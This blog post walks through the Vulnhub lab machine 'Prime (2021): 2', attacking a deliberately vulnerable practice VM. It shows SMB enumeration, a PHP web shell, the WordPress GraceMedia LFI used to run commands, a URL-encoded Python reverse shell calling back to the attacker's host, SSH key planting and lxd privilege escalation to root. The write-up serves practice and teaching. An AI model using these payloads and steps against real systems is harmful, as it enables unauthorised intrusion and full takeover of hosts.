日度归档:2021 年 5 月 28 日

Vulnhub Prime (2021): 2 Walkthrough

发表评论

Vulnhub Prime (2021): 2 Walkthrough

https://www.vulnhub.com/entry/prime-2021-2,696/

Scan ports.

# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
 Nmap scan report for 192.168.33.139 (192.168.33.139)
 Host is up (0.0041s latency).
 Not shown: 65530 closed ports
 PORT      STATE SERVICE     VERSION
 22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
 |   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
 |_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
 80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
 |_http-server-header: Apache/2.4.46 (Ubuntu)
 |_http-title: HackerCTF
 139/tcp   open  netbios-ssn Samba smbd 4.6.2
 445/tcp   open  netbios-ssn Samba smbd 4.6.2
 10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
 |_http-server-header: SimpleHTTP/0.6 Python/3.9.4
 |_http-title: Directory listing for /
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 Host script results:
 |_clock-skew: 7h59m59s
 |_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-05-12T18:00:05
 |_  start_date: N/A

Check smb share folders.

 smbclient -L 192.168.33.139                                                                      fish-0 | 130 [08:45:41]
 Enter WORKGROUP\kali's password:

         Sharename       Type      Comment
         ---------       ----      -------
         print$          Disk      Printer Drivers
         welcome         Disk      Welcome to Hackerctf LAB
         IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
 SMB1 disabled -- no workgroup available

Found shell.php in /upload.

```
smbclient '\\192.168.33.139\welcome' fish-0 | 1 [08:47:16]
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 13 04:27:52 2021
.. D 0 Sat May 8 02:38:58 2021
.mysql_history H 18 Sat May 8 15:05:03 2021
.ssh DH 0 Thu May 13 04:29:18 2021
.profile H 807 Sat Mar 20 00:02:58 2021
upload D 0 Sun May 9 19:19:02 2021
.sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021
.bash_logout H 220 Sat Mar 20 00:02:58 2021
.cache DH 0 Sat May 8 02:39:15 2021
something N 82 Sat May 8 00:18:09 2021
secrets N 0 Sat May 8 00:15:17 2021
.bash_history H 72 Sun May 9 19:23:26 2021
.bashrc H 3771 Sat Mar 20 00:02:58 2021

             19475088 blocks of size 1024. 9885876 blocks available

smb: \> cd upload
smb: \upload\> dir
. D 0 Sun May 9 19:19:02 2021
.. D 0 Thu May 13 04:27:52 2021
shell.php A 35 Sun May 9 19:19:02 2021

             19475088 blocks of size 1024. 9885872 blocks available

smb: \upload\> get shell.php
getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \upload\>


Check shell.php.

cat shell.php smbclient-0 | 0 [08:48:39]
<?php echo system($_GET['cmd']);?>


Found user name jarves.

cat something fish-0 | 0 [09:29:34]
I wanted to make it my home directory. But idea must be changed.

Thanks,
jarves


Scan folders of port 80.

cat 80.log fish-0 | 0 [09:30:32]
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]


Check vulnerability of wordpress, found 1 user and 1 vulnerable plugin.
wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
...
[+] gracemedia-media-player		 Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/ Latest Version: 1.0 (up to date) Last Updated: 2013-07-21T15:09:00.000Z Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt [!] Directory listing is enabled
Found By: Known Locations (Aggressive Detection)
- http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
[!] 1 vulnerability identified:
[!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
References:
- https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://www.exploit-db.com/exploits/46537/
- https://seclists.org/fulldisclosure/2019/Mar/26

...
[i] User(s) Identified:

[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)


The plugin has LFI vulnerability.

searchsploit gracemedia

Exploit Title Path
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion php/webapps/46537.txt 

Check if LFI works.

curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds
&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...


Check if LFI works.

curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)⏎


Visit the following address.

Visit http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Get reverse shell.

nc -nlvp 1234 ifconfig-0 | 0 [08:50:29]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$

<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Another way to directly get ssh login as jarves is to directly upload authorized_keys through smb.

smbclient '\\192.168.33.139\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: .ssh\> put authorized_keys
putting file authorized_keys as .ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: .ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.


Check group of jarves.

jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)


Use the classic lxd vulnerability.

lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite


Now we are root.

jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)


Upload authorized_keys to /root/.ssh, get ssh login directly.

ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab